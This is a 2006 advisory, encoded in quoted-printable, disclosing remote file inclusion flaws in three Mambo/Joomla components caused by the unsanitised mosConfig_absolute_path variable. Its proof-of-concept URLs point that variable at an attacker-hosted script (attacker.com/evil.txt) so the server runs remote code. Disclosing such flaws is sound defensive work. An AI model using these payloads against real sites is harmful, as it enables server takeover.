|
ECHO_ADV_38$2006=0D
=0D
-----------------------------------------------------------------------------------------------=0D
=0D
[ECHO_ADV_38$2006] Multiple Mambo/Joomla Component Remote File Include Vulnerabilities=0D
-----------------------------------------------------------------------------------------------=0D
=0D
=0D
Author : Ahmad Maulana a.k.a Matdhule=0D
Date : July 12th 2006=0D
Location : Indonesia, Jakarta=0D
Web : http://advisories.echo.or.id/adv/adv38-matdhule-2006.txt=0D
Critical Lvl : Highly critical=0D
Impact : System access=0D
Where : From Remote=0D
------------------------------------------------------------------------=0D
=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
# Hashcash Component=0D
=0D
Application : com_hashcash Component=0D
version : 1.2.1=0D
URL : http://developer.joomla.org/sf/frs/do/viewRelease/projects.com_hashcash/frs.components.com_hashcash=0D
=0D
# HTMLArea3 addon - ImageManager=0D
=0D
Application : HTMLArea3 addon - ImageManager=0D
Version : 1.5=0D
URL : =0D
=0D
# Sitemap 2.0.0 for Mambo 4.5.1 CMS=0D
=0D
Application : Sitemap 2.0.0 for Mambo 4.5.1 CMS=0D
Version : Sitemap 2.0.0=0D
URL : http://mamboxchange.com/frs/download.php/6463/sitemap20.zip=0D
=0D
------------------------------------------------------------------------=0D
=0D
=0D
Vulnerability:=0D
~~~~~~~~~~~~~~=0D
=0D
# Hashcash Component=0D
=0D
In folder com_hashcash we found vulnerability script server.php.=0D
=0D
-----------------------server.php---------------------------------------=0D
http://www.gnu.org/copyleft/gpl.html=0D
* @version $Revision: 1.5 $=0D
**/=0D
=0D
require($mosConfig_absolute_path."/administrator/components/com_htmlarea3_xtd-c/config.htmlarea3_xtd-c.php");=0D
=0D
------------------------------------------------------------------------=0D
=0D
# Sitemap 2.0.0 for Mambo 4.5.1 CMS=0D
=0D
In folder com_sitemap we found vulnerability script sitemap.xml.php.=0D
=0D
-----------------------sitemap.xml.php----------------------=0D
http://www.gnu.org/copyleft/gpl.html GNU/GPL=0D
* Mambo is Free Software=0D
* Author : Johan Janssens - johan@jinx.be (http://www.jinx.be)=0D
**/=0D
=0D
// XML library=0D
require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );=0D
=0D
------------------------------------------------------------=0D
=0D
Variables $mosConfig_absolute_path are not properly sanitized. When=0D
register_globals=on=0D
and allow_fopenurl=on an attacker can exploit this vulnerability with a=0D
simple php injection script.=0D
=0D
Proof Of Concept:=0D
~~~~~~~~~~~~~~~=0D
=0D
http://[target]/[path]/components/com_hashcash/server.php?mosConfig_absolute_path=http://attacker.com/evil.txt?=0D
http://[target]/[path]/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://evilscript=0D
http://[target]/[path]/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://attacker.com/evil.txt? =0D
=0D
Solution:=0D
~~~~~~~=0D
=0D
sanitize variabel $mosConfig_absolute_path.=0D
=0D
=0D
------------------------------------------------------------------------=0D
---=0D
Shoutz:=0D
~~~~~=0D
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)=0D
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous=0D
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama=0D
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com=0D
~ #mardongan #jambihackerlink #e-c-h-o @irc.dal.net=0D
------------------------------------------------------------------------=0D
---=0D
Contact:=0D
~~~~~~=0D
=0D
matdhule[at]gmail[dot]com=0D
=0D
-------------------------------- [ EOF ]----------------------------------=0D
=0D